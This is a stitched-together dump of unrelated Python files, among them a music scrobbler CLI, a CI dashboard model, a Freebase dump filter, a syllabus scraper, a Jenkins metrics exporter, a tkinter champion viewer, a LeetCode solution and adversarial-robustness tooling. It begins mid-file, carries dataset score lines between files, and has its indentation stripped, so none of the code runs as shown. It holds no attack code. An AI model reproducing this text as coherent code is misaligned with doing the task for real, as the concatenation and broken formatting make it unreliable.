print("Scrobbling successful!")
config["libre.fm"]["SESSION_KEY"] = librefm_auth["session_key"]
break
else:
print("Scrobbling unsuccessful :(")
print(f"Saving non-scrobbled tracks to {tracks_file}")
save_tracks(tracks_file, spotify_tracks)
sys.exit(1)
if kwargs["write_config"]:
with open(config_file, "w") as config_file:
config.write(config_file)
print("Saved config file! ;)")
if __name__ == "__main__":
parser = ArgumentParser()
subparsers = parser.add_subparsers()
scrobble_parser = subparsers.add_parser(
"scrobble", help="Scrobble your Spotify's recently played tracks to libre.fm",
)
scrobble_parser.set_defaults(func=main)
scrobble_parser.add_argument(
"-c",
"--config",
default="config.ini",
help="Config file to read script parameters (default: %(default)s)",
)
scrobble_parser.add_argument(
"--no-write-config",
dest="write_config",
action="store_false",
help="Don't write to config at the end",
)
scrobble_parser.add_argument(
"--tracks-file",
default=".tracks.pickle",
help="File to save non-scrobbled tracks in case of any error",
)
scrobble_parser.add_argument(
"--ignore-tracks-file",
dest="scrobble_remaining",
action="store_false",
help="Don't try to scrobble remaining tracks saved on tracks-file",
)
spotify_group = scrobble_parser.add_argument_group(
"Spotify", description="Spotify related parameters"
)
spotify_group.add_argument("--spotify-user", help="Your Spotify username")
spotify_group.add_argument("--cache-path", help="Spotify's cache path")
spotify_group.add_argument(
"--spotify-redirect-uri",
default="http://localhost",
help="Spotify redirect URI set on your Spotify Developer's page - doesn't need to be accessible (default: %(default)s)",
)
spotify_group.add_argument("--spotify-client-id", help="Your Spotify Client ID")
spotify_group.add_argument(
"--spotify-client-secret", help="Your Spotify Client Secret"
)
spotify_group.add_argument(
"--force-refresh-token",
action="store_true",
help="Force refresh your Spotify Client Token before starting the routine",
)
last_played = spotify_group.add_mutually_exclusive_group()
last_played.add_argument(
"--last-timestamp",
type=int,
help="UNIX timestamp (milliseconds) representing the date and time you listened the last scrobbled Spotify track",
)
last_played.add_argument(
"--search-after",
help="Only tracks played after this date and time will be scrobbled. Must follow search-after-fmt format",
)
spotify_group.add_argument(
"--search-after-fmt",
default="%Y-%m-%dT%H:%M:%S.%f%z",
help="Datetime format (in strftime syntax) for search-after (default: %(default)s)",
)
librefm_group = scrobble_parser.add_argument_group(
"Libre.fm", description="Libre.fm related parameters"
)
librefm_group.add_argument("--librefm-user", help="Your Libre.fm username")
librefm_group.add_argument("--librefm-password", help="<PASSWORD>")
init_parser = subparsers.add_parser(
"init", help="CLI wizard to generate a config file"
)
init_parser.add_argument(
"config_file",
nargs="?",
default="config.ini",
help="Config file to save settings (default: %(default)s)",
)
init_parser.set_defaults(func=init_config)
help_parser = subparsers.add_parser(
"help", help="Show the complete help message for all commands", add_help=False,
)
help_parser.set_defaults(
func=lambda **kwargs: print(
f"{scrobble_parser.format_help()}\n{'-'*27}\n{init_parser.format_help()}"
)
)
args = parser.parse_args()
dict_args = vars(args)
if dict_args:
args.func(**dict_args)
else:
parser.print_help()
| 3.0625 | 3 |
rhoci/models/DFG.py | ahmedmagdyawaad/redhat-ci-dashboard | 8 | 12795714 | # Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from elasticsearch import Elasticsearch
from flask import current_app as app
import re
import yaml
from rhoci.database import Database
class DFG(object):
def __init__(self, name, squads=[], components=[],
squad_to_components={}):
self.name = name
self.squads = squads
self.components = components
self.squad_to_components = squad_to_components
def insert(self):
"""Inserts object to the database."""
if not Database.find_one("DFGs", {"name": self.name}):
Database.insert(collection='DFGs',
data=self.json())
def json(self):
return {
'name': self.name,
'squads': self.squads,
'components': self.components,
'squad_to_components': self.squad_to_components,
}
@classmethod
def get_all_DFGs_based_on_jobs(cls):
"""Returns a list of all DFGs based on job model where it cuts the
DFG name from the job name and makes sure the set is unique.
"""
DFGs = []
es = Elasticsearch(app.config['custom']['elk']['es']['url'])
body = {
"size": 0,
"aggs" : {
"jobs" : {
"terms" : { "field" : "DFG.keyword", "size" : 4000 }
}
}
}
result = es.search(index="logstash", body=body)
for bucket in result["aggregations"]['jobs']['buckets']:
DFGs.append(bucket['key'])
return DFGs
@classmethod
def get_all_squads(cls):
squads = []
for DFG_db in cls.find():
if DFG_db['squads']:
squads.extend(DFG_db['squads'])
return squads
@classmethod
def get_all_components(cls):
components = []
for DFG_db in cls.find():
if DFG_db['components']:
components.extend(DFG_db['components'])
return components
@classmethod
def get_squad(cls, DFG_name, component):
DFG_db = cls.find_one(name=DFG_name)
if DFG_db['squad_to_components']:
for squad, components in DFG_db['squad_to_components'].items():
for comp in components:
if comp == component:
return squad
if component == components:
return squad
return
@classmethod
def get_squad_components(cls, DFG_name, squad):
"""Returns all the components of a given squad."""
DFG_db = cls.find_one(name=DFG_name)
return DFG_db['squad_to_components'][squad]
@classmethod
def find(cls):
"""Returns find query."""
query = {}
DFGs = Database.find(collection="DFGs", query=query)
return DFGs
@classmethod
def find_one(cls, name):
"""Returns one query result."""
query = {}
if name:
query['name'] = name
DFGs = Database.find_one(collection="DFGs", query=query)
return DFGs
@classmethod
def count(cls, squads=False):
"""Returns the count of DFGs documents."""
query = {}
if squads:
return len(cls.get_all_squads())
else:
DFGs = Database.find(collection='DFGs', query=query)
return DFGs.count()
| 2.21875 | 2 |
GifGen/complexity.py | james-alvey-42/ProgramTools | 0 | 12795715 | <filename>GifGen/complexity.py<gh_stars>0
'''
Idea based on Shangnan (2019) [http://inspirehep.net/record/1722270] regarding classical complexity and its relation to entropy. This script considers a string of K n-bits (x1 x2 ... xK) in an "all-i" configuration. It then randomly updates the configuration to illustrate the long-term behaviour.
'''
import numpy as np
import matplotlib.pyplot as plt
from random import randint
import sys
plt.style.use('ja')
def update_configuration(state, n):
K = len(state) - 1
idx = randint(0, K)
up = bool(randint(0, 1))
if up:
if state[idx] != n - 1:
state[idx] = state[idx] + 1
else:
state[idx] = 0
else:
if state[idx] != 0:
state[idx] = state[idx] - 1
else:
state[idx] = n - 1
return state
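# Illustrative example of a single update (assuming n=4): a site holding value 3 that is
# randomly incremented wraps around to 0, and a site holding 0 that is decremented wraps to n-1 = 3.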
bar_color = '#477890'
line_color = '#990D35'
text_color = '#153243'
if __name__ == '__main__':
K = int(sys.argv[1])
n = int(sys.argv[2])
iters = int(sys.argv[3])
state = np.zeros(K) + randint(0, n - 1)
iter = 0
plt.ion()
plt.figure(figsize=(7, 7))
while iter < iters:
print(str(iter) + '/' + str(iters), end='\r')
unique, counts = np.unique(state, return_counts=True)
plt.bar(unique, counts, width=0.5, align='center', alpha=1.0, color=bar_color)
axis = plt.axis()
axis = (-0.1*n, 1.1*n - 1, 0, K)
vals = np.linspace(-n, 2*n, 100)
avg = np.zeros(100) + (K/n)
plt.plot(vals, avg, lw = 4, color=line_color, alpha = 0.8)
plt.axis(axis)
style = dict(size=15, color=text_color)
plt.text(0.3*n - 1, 0.9*K, r'$K = {} \,$'.format(K) + r', ' + '$n = {} \,$'.format(n) + r', ' + r'Iteration: ${} / {} \,$'.format(iter, iters), **style, bbox=dict(facecolor='white', edgecolor='black', boxstyle='round,pad=0.3'))
plt.xticks([])
plt.draw()
#plt.savefig('frames/fig_' + '{0:04d}'.format(iter), transparent=True)
plt.pause(0.0001)
plt.clf()
state = update_configuration(state, n)
iter += 1
| 3.09375 | 3 |
convert/explode-dump.py | google/freebase-wikidata-converter | 57 | 12795716 | <reponame>google/freebase-wikidata-converter
"""
Copyright 2015 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gzip
import sys
filters = [
'<http://rdf.freebase.com/ns/common.notable_for.display_name>',
'<http://www.w3.org/1999/02/22-rdf-syntax-ns#type>',
'<http://rdf.freebase.com/ns/type.object.type>',
'<http://rdf.freebase.com/ns/type.type.instance>',
'<http://rdf.freebase.com/ns/type.object.key>',
'<http://www.w3.org/2000/01/rdf-schema#label>',
'<http://rdf.freebase.com/ns/type.object.name>',
'<http://rdf.freebase.com/ns/common.topic.topic_equivalent_webpage>',
'<http://rdf.freebase.com/ns/common.topic.notable_for>',
'<http://rdf.freebase.com/ns/common.notable_for.predicate>',
'<http://rdf.freebase.com/ns/common.notable_for.notable_object>',
'<http://rdf.freebase.com/ns/common.notable_for.object>',
'<http://rdf.freebase.com/ns/common.topic.notable_types>',
'<http://rdf.freebase.com/ns/common.topic.description>',
'<http://rdf.freebase.com/key/dataworld.freeq>',
'<http://rdf.freebase.com/ns/type.permission.controls>',
'<http://rdf.freebase.com/ns/type.object.permission>',
'<http://rdf.freebase.com/key/en>',
'<http://rdf.freebase.com/ns/common.document.text>',
'<http://rdf.freebase.com/ns/common.topic.article>',
'<http://rdf.freebase.com/ns/common.topic.image>',
'<http://rdf.freebase.com/ns/common.topic.alias>',
'<http://rdf.freebase.com/ns/common.document.source_uri>',
'<http://rdf.freebase.com/ns/dataworld.gardening_hint.last_referenced_by>',
'<http://rdf.freebase.com/ns/type.object.id>',
'<http://rdf.freebase.com/ns/dataworld.gardening_hint.replaced_by>',
'<http://rdf.freebase.com/ns/freebase.object_hints.best_hrid>'
]
linecount = 0
filtercount = 0
result = open(sys.argv[2], 'w')
types = open(sys.argv[3], 'w')
labels = open(sys.argv[4], 'w')
for line in gzip.open(sys.argv[1]):
linecount += 1
if linecount % 1000000 == 0 : print filtercount, linecount / 1000000
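    # each dump line is expected to be a tab-separated N-Triples row: <subject>\t<predicate>\t<object>\t.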
sub, pred, obj, dot = line.split("\t")
if not (sub.startswith('<http://rdf.freebase.com/ns/m.') or sub.startswith('<http://rdf.freebase.com/ns/g.')):
continue
if pred == '<http://rdf.freebase.com/ns/type.object.type>':
types.write(sub[28:-1] + "\t" + obj[24:-1] + "\n")
continue
if pred == '<http://rdf.freebase.com/ns/type.object.name>':
labels.write(sub[28:-1] + "\t" + obj + "\n")
continue
if pred in filters:
continue
if pred.startswith('/fictional_universe'):
continue
if 'wikipedia' in pred:
continue
if 'topic_server' in pred:
continue
result.write(line)
filtercount += 1
print filtercount, linecount
result.close()
types.close()
labels.close()
print "saved"
| 1.78125 | 2 |
wsl_spider/wsl_spider/spiders/course_info.py | waseda-room-finder/waseda-syllabus-scraper | 4 | 12795717 | <reponame>waseda-room-finder/waseda-syllabus-scraper<filename>wsl_spider/wsl_spider/spiders/course_info.py
# -*- coding: utf-8 -*-
import scrapy
# This file is used to scrape a single course page. It is not used currently.
class CourseInfoSpider(scrapy.Spider):
name = 'course_info'
allowed_domains = ['wsl.waseda.jp/syllabus']
start_urls = [('https://www.wsl.waseda.jp/syllabus/'
'JAA104.php?pKey=1200000007012017120000000712&pLng=jp')]
# Spanish II 'JAA104.php?pKey=210CO14300032017210CO1430021&pLng=en')]
# Info Design 'JAA104.php?pKey=26GF02200201201726GF02200226&pLng=en')]
base_xpath = '//*[@class="ct-common ct-sirabasu"]/tbody/tr'
def parse(self, response):
course_dict = {
'Course Title' : "",
'Instructor' : "",
'Schedule': "",
'Campus' : "",
'Classroom' : ""
}
course_title = response.xpath((
self.base_xpath + '[contains(th/text(),"Course Title")]/td/div/text()'
)).extract_first()
course_sub_title = response.xpath((
self.base_xpath + '[contains(th/text(),"Course Title")]/td/p/text()'
)).extract_first()
course_dict['Course Title'] = course_title if course_sub_title is None else course_title + course_sub_title
course_dict['Instructor'] = response.xpath((
self.base_xpath + '[contains(th/text(),"Instructor")]/td/text()'
)).extract_first()
course_dict['Schedule'] = response.xpath((
self.base_xpath + '[contains(th/text(),"Term/Day/Period")]/td/text()'
)).extract_first()
classroom_campus = response.xpath((
self.base_xpath + '[contains(th/text(),"Classroom")]/td/text()'
)).extract()
course_dict['Campus'] = classroom_campus[1]
course_dict['Classroom'] = classroom_campus[0]
for key, value in course_dict.items():
value = value.replace(u'\xa0', u' ')
yield course_dict
| 2.765625 | 3 |
jenkins/metrics/queue_metrics.py | levep/jenkins-exporter | 16 | 12795718 | from prometheus_client.core import GaugeMetricFamily
def make_metrics(queue):
list_metrics = []
# Total items in Queue
metric = GaugeMetricFamily(
'jenkins_queue_total',
'Total items in Queue',
labels=None
)
metric.add_metric(
labels=[],
value=queue.get_total_items()
)
list_metrics.append(metric)
# Duration of an item in Queue
metric = GaugeMetricFamily(
'jenkins_queue_item_duration',
        'Duration of an item in Queue in seconds',
labels=['queue_id', 'item_name']
)
list_items = queue.get_list_items()
for item_id in list_items:
item = queue.get_item(item_id)
item_name = item['name']
queue_id = str(item_id)
metric.add_metric(
labels=[queue_id, item_name],
value=queue.get_in_queue_duration(item_id)
)
list_metrics.append(metric)
return list_metrics
| 2.515625 | 3 |
webapp/src/database/queries/artifact_queries.py | muctadir/labeling-machine | 0 | 12795719 | from datetime import datetime
from typing import List
from sqlalchemy import insert, func, select, distinct
from src import db
from src.database.models import Artifact, LockedArtifact, ArtifactLabelRelation, FlaggedArtifact, LabelingData
from src.helper.tools_common import string_none_or_empty, who_is_signed_in
def get_artifact_by_id(art_id: int):
return db.session.execute(select(Artifact).where(Artifact.id == art_id)).scalar()
def add_artifacts(artifact_txt_list: List[str], artifact_identifier: str, creator: str,
manually_uploaded: bool = False) -> List[int]:
artifact_txt_list = filter(lambda s: not string_none_or_empty(s), artifact_txt_list)
inserted_ids = []
for art in artifact_txt_list:
stmt = insert(Artifact).values(text=art, identifier=artifact_identifier, created_by=creator,
uploaded_manually=manually_uploaded)
inserted_ids.append(db.session.execute(stmt).inserted_primary_key[0])
db.session.commit()
return inserted_ids
def get_artifacts_with_label(label_text: str) -> List[Artifact]:
qry = select(Artifact).join(ArtifactLabelRelation.artifact).join(ArtifactLabelRelation.label).where(
LabelingData.labeling == label_text)
return [artifact for artifact, in db.session.execute(qry).all()]
def unlock_artifacts_by(username):
if not username:
return
my_lock = LockedArtifact.query.filter_by(created_by=username).first()
if my_lock is not None:
db.session.delete(my_lock)
db.session.commit()
def lock_artifact_by(username, artifact_id):
if not username:
return
unlock_artifacts_by(username)
db.session.add(LockedArtifact(created_by=username, artifact_id=artifact_id))
db.session.commit()
def get_locked_artifacts():
update_api_locks()
result = db.session.query(LockedArtifact.artifact_id, func.count(LockedArtifact.created_by)).group_by(
LockedArtifact.artifact_id).all()
all_locks = {row[0]: row[1] for row in result}
return all_locks
def update_api_locks():
all_locks = LockedArtifact.query.all()
now_datetime = datetime.utcnow()
for aLock in all_locks:
if (now_datetime - aLock.created_at).total_seconds() / 60 >= 15: # 15min
# print("Unlocking Artifact: {} -> {}:{}".format(aLock.username, aLock.sourceId, aLock.artifact_post_id))
db.session.delete(aLock)
db.session.commit()
def total_artifact_count() -> int:
return len(db.session.execute(select(Artifact.id)).all())
def artifact_needs_labeling_count() -> int:
query = select(Artifact.id).except_(
select(ArtifactLabelRelation.artifact_id).group_by(ArtifactLabelRelation.artifact_id).having(
func.count(ArtifactLabelRelation.created_by) > 1))
return len(db.session.execute(query).all())
def get_false_positive_artifacts():
"""
Return artifacts marked as false positive by me, or marked as false positive by at least 2 people
"""
q_artifacts_marked_fp_by_me = db.session.query(distinct(FlaggedArtifact.artifact_id)).filter(
FlaggedArtifact.created_by == who_is_signed_in())
q_artifacts_marked_fp_by_2 = db.session.query(
distinct(FlaggedArtifact.artifact_id)).group_by(FlaggedArtifact.artifact_id).having(func.count() > 1)
result = {row[0] for row in q_artifacts_marked_fp_by_me.union(q_artifacts_marked_fp_by_2).all()}
return result
| 2.328125 | 2 |
src/PQWER_dex.py | jsleslie/PQWER | 0 | 12795720 | <reponame>jsleslie/PQWER<gh_stars>0
"""
Changes made:
make widget parents explicitly declared
use with either the root window or a Toplevel
bind the Return key to the selection method
"""
#from tkinter import *
import tkinter as tk
import re
from PIL import ImageTk, Image
import json
from tkinter import ttk
# Helper function extracting ability descriptions from champion json files
def get_PQWER(champion):
"""
Consumes a champion name in string form and returns a dictionary containing
the champion's passive, Q, W, E, and R ability names and descriptions
Parameters:
-----------
champion string
Example:
-----------
get_PQWER("Malphite") -> dictionary
"""
# Read champ-specific json
with open(f"data/dragontail-11.1.1/11.1.1/data/en_US/champion/{champion}.json") as f:
data = json.load(f)
global champ_info
champ_info =dict()
# Add passive
passive_name = data['data'][champion]['passive']['name']
passive_description = data['data'][champion]['passive']['description']
combined_passive = passive_name + '\n\n' + passive_description
champ_info['passive'] = combined_passive
# Add Q
Q_name = data['data'][champion]['spells'][0]['name']
Q_description = data['data'][champion]['spells'][0]['description']
combined_Q = Q_name + '\n\n' + Q_description
champ_info['Q'] = combined_Q
# Add W
W_name = data['data'][champion]['spells'][1]['name']
W_description = data['data'][champion]['spells'][1]['description']
combined_W = W_name + '\n\n' + W_description
champ_info['W'] = combined_W
# Add E
E_name = data['data'][champion]['spells'][2]['name']
E_description = data['data'][champion]['spells'][2]['description']
combined_E = E_name + '\n\n' + E_description
champ_info['E'] = combined_E
# Add R
R_name = data['data'][champion]['spells'][3]['name']
R_description = data['data'][champion]['spells'][3]['description']
combined_R = R_name + '\n\n' + R_description
champ_info['R'] = combined_R
return champ_info
def update_descriptions(champion):
champ_info = get_PQWER(champion)
Passive_text.config(text=champ_info['passive'])
Q_text.config(text=champ_info['Q'])
W_text.config(text=champ_info['W'])
E_text.config(text=champ_info['E'])
R_text.config(text=champ_info['R'])
# Class adopted from samuelkazeem/tkinter-autocomplete-listbox.py
class AutocompleteEntry(tk.Entry):
def __init__(self, autocompleteList, *args, **kwargs):
self.listboxLength = 0
self.parent = args[0]
# Custom matches function
if 'matchesFunction' in kwargs:
self.matchesFunction = kwargs['matchesFunction']
del kwargs['matchesFunction']
else:
def matches(fieldValue, acListEntry):
pattern = re.compile(
'.*' + re.escape(fieldValue) + '.*', re.IGNORECASE)
return re.match(pattern, acListEntry)
self.matchesFunction = matches
# Custom return function
if 'returnFunction' in kwargs:
self.returnFunction = kwargs['returnFunction']
del kwargs['returnFunction']
else:
def selectedValue(value):
print(value)
self.returnFunction = selectedValue
tk.Entry.__init__(self, *args, **kwargs)
#super().__init__(*args, **kwargs)
self.focus()
self.autocompleteList = autocompleteList
self.var = self["textvariable"]
if self.var == '':
self.var = self["textvariable"] = tk.StringVar()
self.var.trace('w', self.changed)
self.bind("<Right>", self.selection)
self.bind("<Up>", self.moveUp)
self.bind("<Down>", self.moveDown)
self.bind("<Return>", self.selection)
self.bind("<Escape>", self.deleteListbox)
self.listboxUp = False
def deleteListbox(self, event=None):
if self.listboxUp:
self.listbox.destroy()
self.listboxUp = False
def select(self, event=None):
if self.listboxUp:
index = self.listbox.curselection()[0]
value = self.listbox.get(tk.ACTIVE)
self.listbox.destroy()
self.listboxUp = False
self.delete(0, tk.END)
self.insert(tk.END, value)
self.returnFunction(value)
def changed(self, name, index, mode):
if self.var.get() == '':
self.deleteListbox()
else:
words = self.comparison()
if words:
if not self.listboxUp:
self.listboxLength = len(words)
self.listbox = tk.Listbox(self.parent,
width=self["width"], height=self.listboxLength)
self.listbox.bind("<Button-1>", self.selection)
self.listbox.bind("<Right>", self.selection)
self.listbox.place(
x=self.winfo_x(), y=self.winfo_y() + self.winfo_height())
self.listboxUp = True
else:
self.listboxLength = len(words)
self.listbox.config(height=self.listboxLength)
self.listbox.delete(0, tk.END)
for w in words:
self.listbox.insert(tk.END, w)
else:
self.deleteListbox()
def selection(self, event):
if self.listboxUp:
self.var.set(self.listbox.get(tk.ACTIVE))
self.listbox.destroy()
self.listboxUp = False
self.icursor(tk.END)
def moveUp(self, event):
if self.listboxUp:
if self.listbox.curselection() == ():
index = '0'
else:
index = self.listbox.curselection()[0]
self.listbox.selection_clear(first=index)
index = str(int(index) - 1)
if int(index) == -1:
index = str(self.listboxLength-1)
self.listbox.see(index) # Scroll!
self.listbox.selection_set(first=index)
self.listbox.activate(index)
def moveDown(self, event):
if self.listboxUp:
if self.listbox.curselection() == ():
index = '-1'
else:
index = self.listbox.curselection()[0]
if index != tk.END:
self.listbox.selection_clear(first=index)
if int(index) == self.listboxLength-1:
index = "0"
else:
index = str(int(index)+1)
self.listbox.see(index) # Scroll!
self.listbox.selection_set(first=index)
self.listbox.activate(index)
def comparison(self):
return [w for w in self.autocompleteList if self.matchesFunction(self.var.get(), w)]
if __name__ == '__main__':
# Taken from https://www.reddit.com/r/leagueoflegends/comments/cumsa6/list_of_league_of_legends_champion_separated_by/
autocompleteList = ["Aatrox","Ahri","Akali","Alistar","Amumu","Anivia","Annie","Aphelios","Ashe","Aurelion Sol","Azir",\
"Bard","Blitzcrank","Brand","Braum","Caitlyn","Camille","Cassiopeia","Cho'Gath","Corki","Darius","Diana","Dr. Mundo","Draven",\
"Ekko","Elise","Evelynn","Ezreal","Fiddlesticks","Fiora","Fizz","Galio","Gangplank","Garen","Gnar","Gragas","Graves","Hecarim",\
"Heimerdinger","Illaoi","Irelia","Ivern","Janna","<NAME>","Jax","Jayce","Jhin","Jinx","Kai'Sa","Kalista","Karma","Karthus",\
"Kassadin","Katarina","Kayle","Kayn","Kennen","Kha'Zix","Kindred","Kled","Kog'Maw","LeBlanc","<NAME>","Leona","Lillia","Lissandra",\
"Lucian","Lulu","Lux","Malphite","Malzahar","Maokai","Master Yi","Miss Fortune","Mordekaiser","Morgana","Nami","Nasus","Nautilus",\
"Neeko","Nidalee","Nocturne","Nunu and Willump","Olaf","Orianna","Ornn","Pantheon","Poppy","Pyke","Qiyana","Quinn","Rakan",\
"Rammus","Rek'Sai","Rell","Renekton","Rengar","Riven","Rumble","Ryze","Samira","Sejuani","Senna","Seraphine","Sett",\
"Shaco","Shen","Shyvana","Singed","Sion","Sivir","Skarner","Sona","Soraka","Swain","Sylas","Syndra","<NAME>","Taliyah",\
"Talon","Taric","Teemo","Thresh","Tristana","Trundle","Tryndamere","Twisted Fate","Twitch","Udyr","Urgot","Varus","Vayne","Veigar",\
"Vel'Koz","Vi","Viktor","Vladimir","Volibear","Warwick","Wukong","Xayah","Xerath","<NAME>","Yasuo","Yone","Yorick","Yuumi","Zac","Zed","Ziggs","Zilean","Zoe","Zyra"]
def matches(fieldValue, acListEntry):
pattern = re.compile(re.escape(fieldValue) + '.*', re.IGNORECASE)
return re.match(pattern, acListEntry)
root = tk.Tk()
topLevel = tk.Toplevel()
topLevel.title('League Champions Dex')
#pass either root or toplevel as the second argument to use as entry's parent widget
entry = AutocompleteEntry(
autocompleteList, topLevel, width=32, matchesFunction=matches)
entry.grid(row=0, column=0, columnspan=2)
search_button = tk.Button(topLevel,text="Search", padx=10, command=lambda: update_descriptions(entry.get()))
search_button.grid(row=0,column=3)
# Save dynamic descriptions
P = tk.StringVar()
# tk.Button(topLevel, text='Python').grid(column=0)
# tk.Button(topLevel, text='Tkinter').grid(column=0)
# tk.Button(topLevel, text='Regular Expressions').grid(column=0)
# tk.Button(topLevel, text='Fixed bugs').grid(column=0)
# tk.Button(topLevel, text='New features').grid(column=0)
# tk.Button(topLevel, text='Check code comments').grid(column=0)
# Load images
passive_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/Passive.png"))
Q_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/Q.png"))
W_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/W.png"))
E_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/E.png"))
R_icon = ImageTk.PhotoImage(Image.open("data/inhouse/img/R.png"))
# Place them inside labels
passive_label = tk.Label(topLevel, image=passive_icon)
Q_label = tk.Label(topLevel, image=Q_icon)
W_label = tk.Label(topLevel, image=W_icon)
E_label = tk.Label(topLevel, image=E_icon)
R_label = tk.Label(topLevel, image=R_icon)
# Assign locations to image labels
passive_label.grid(row=1,column=0, pady=20)
Q_label.grid(row=2,column=0, pady=20)
W_label.grid(row=3, column=0, pady=20)
E_label.grid(row=4, column=0, pady=20)
R_label.grid(row=5, column=0,pady=20)
# Add text boxes
# Passive_text = tk.Label(topLevel, textvariable= P)
# P.set(champ_info['passive'])
Passive_text = tk.Label(topLevel, text="Placeholder", wraplength=600, justify="left")
Q_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
W_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
E_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
R_text = tk.Label(topLevel,text="Placeholder", wraplength=600, justify="left")
# Assign locations to text boxes
Passive_text.grid(row=1, column=1, pady=20)
Q_text.grid(row=2, column=1, pady=20)
W_text.grid(row=3, column=1, pady=20)
E_text.grid(row=4, column=1, pady=20)
R_text.grid(row=5, column=1, pady=20)
# Add exit button
button_quit = tk.Button(topLevel, text="Exit Program", command=root.quit)
button_quit.grid(row=10, column=3)
root.mainloop() | 2.515625 | 3 |
code/Solution_0187_findRepeatedDnaSequences.py | qizhenkang/myLeetCode | 0 | 12795721 | <reponame>qizhenkang/myLeetCode
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 8 00:05:44 2021
@author: qizhe
"""
class Solution:
def findRepeatedDnaSequences(self, s: str):
"""
        Reading the problem:
        1. Feels like searching for repeated substrings of fixed length 10 - there is no given target, we search without one
        2. At first glance it feels awkward; no obvious approach comes to mind
        3. The length is fixed at 10, the alphabet is only A/T/C/G, and the string can be up to 1e5 characters long
        4. Looks like a fixed-length-10 sliding window plus a hash table for counting; unsure whether it will time out
        Testing:
        1. Failed once, then passed, but the efficiency was not great
        2. Took about 10 minutes
        Reference solution:
        1. The reference solution encodes A/T/C/G with bit operations; it exploits the fact that the sliding window only changes slightly each step
        2. Approach here: (1) map A/T/C/G to 00 01 10 11; (2) use a sliding window
        Result after the change:
        1. Tests pass; runtime beats 81%, memory beats 90%
"""
N = len(s)
if N <= 10:
return []
result = []
ATCGdict = {'A':0b00,'T':0b01,'C':0b10,'G':0b11}
window = int(0)
strDict = {}
for i in range(10):
window <<= 2
window |= ATCGdict[s[i]]
strDict[window] = 1
# print(window)
for i in range(10,N):
# print(i,'1',bin(window))
window <<= 2
window |= ATCGdict[s[i]]
window &= 1048575
# print(i,'2',bin(window))
if window in strDict:
strDict[window] += 1
if s[i-9:i+1] not in result:
result.append(s[i-9:i+1])
else:
strDict[window] =1
# print(strDict)
return result
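# Worked example (illustrative): with the mapping A=00, T=01, C=10, G=11, the first 10-character
# window of "AAAAACCCCC..." is encoded as the 20-bit integer 0b00000000001010101010.
# Each slide then shifts left by 2, ORs in the next character's 2 bits, and ANDs with
# 1048575 (= 2**20 - 1) to drop the oldest character, so updating the hash costs O(1).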
if __name__ == '__main__':
solu = Solution()
# input_List = [[5,1,9,11],[2,4,8,10],[13,3,6,7],[15,14,12,16]]
# input_List = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
# s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
s = "AAAAAAAAAAAAA"
# intervals = [[1,1],[3,5],[6,7],[8,10],[12,16]]
# newInterval = [2,17]
# intervals = [[2,5]]
# newInterval = [5,7]
# input_List = 1
# numerator = -50
# strs = ["eat", "tea", "tan", "ate", "nat", "bat"]
result = solu.findRepeatedDnaSequences(s)
output_Str = ' result = ' + str(result)
print(output_Str) | 2.546875 | 3 |
tests/test_forms.py | saxix/django-geo | 9 | 12795722 | <reponame>saxix/django-geo<filename>tests/test_forms.py
# -*- coding: utf-8 -*-
import pytest
from geo.forms import administrativeareaform_factory_for_country
from geo.models import AdministrativeArea
from .fixtures import hierachy
@pytest.mark.django_db
def test_administrativeareaform_factory(hierachy):
italy, regione, provincia, comune = hierachy
Form = administrativeareaform_factory_for_country(italy)
instance = AdministrativeArea()
form = Form({'name': 'Lazio',
'type': regione.pk,
'country': italy.pk},
instance=instance)
form.full_clean()
assert form.is_valid()
| 2.015625 | 2 |
scripts/npc/autogen_10308.py | hsienjan/SideQuest-Server | 0 | 12795723 | # ObjectID: 1000002
# ParentID: 10308
# Character field ID when accessed: 4000032
# Object Position X: 2522
# Object Position Y: -22
| 0.980469 | 1 |
demo/auth/__init__.py | yangfan9702/cibo | 0 | 12795724 | from demo.exceptions import AuthException
def token_auth(fn):
def wrapper(*args, **kwargs):
from flask import request
if request.headers.get("token", None) != "123":
raise AuthException("Fail to get access")
return fn(*args, **kwargs)
return wrapper
| 2.65625 | 3 |
counter_attack/cli/commands/approximation_dataset.py | samuelemarro/anti-attacks | 0 | 12795725 | <gh_stars>0
import pathlib
import click
import torch
from counter_attack import defenses, rejectors, training, utils
from counter_attack.cli import definitions, options, parsing
@click.group(name='approximation-dataset')
def approximation_dataset():
pass
@approximation_dataset.command(name='preprocessor')
@options.global_options
@options.dataset_options('train', 'train')
@options.standard_model_options
@options.pretrained_model_options
@options.preprocessor_options
@options.adversarial_dataset_options
@options.approximation_dataset_options('preprocessor')
def approximation_dataset_preprocessor(options):
"""
Generates the dataset to train a substitute model for models
with preprocessors.
Saves the labels predicted by the defended model, using the genuine
dataset + an adversarial dataset.
"""
adversarial_loader = options['adversarial_loader']
approximation_dataset_path = options['approximation_dataset_path']
foolbox_model = options['foolbox_model']
genuine_loader = options['loader']
preprocessor = options['preprocessor']
defended_model = defenses.PreprocessorDefenseModel(
foolbox_model, preprocessor)
genuine_approximation_dataset = training.generate_approximation_dataset(defended_model, genuine_loader, 'Genuine Approximation Dataset')
adversarial_approximation_dataset = training.generate_approximation_dataset(defended_model, adversarial_loader, 'Adversarial Approximation Dataset')
approximation_dataset = genuine_approximation_dataset + adversarial_approximation_dataset
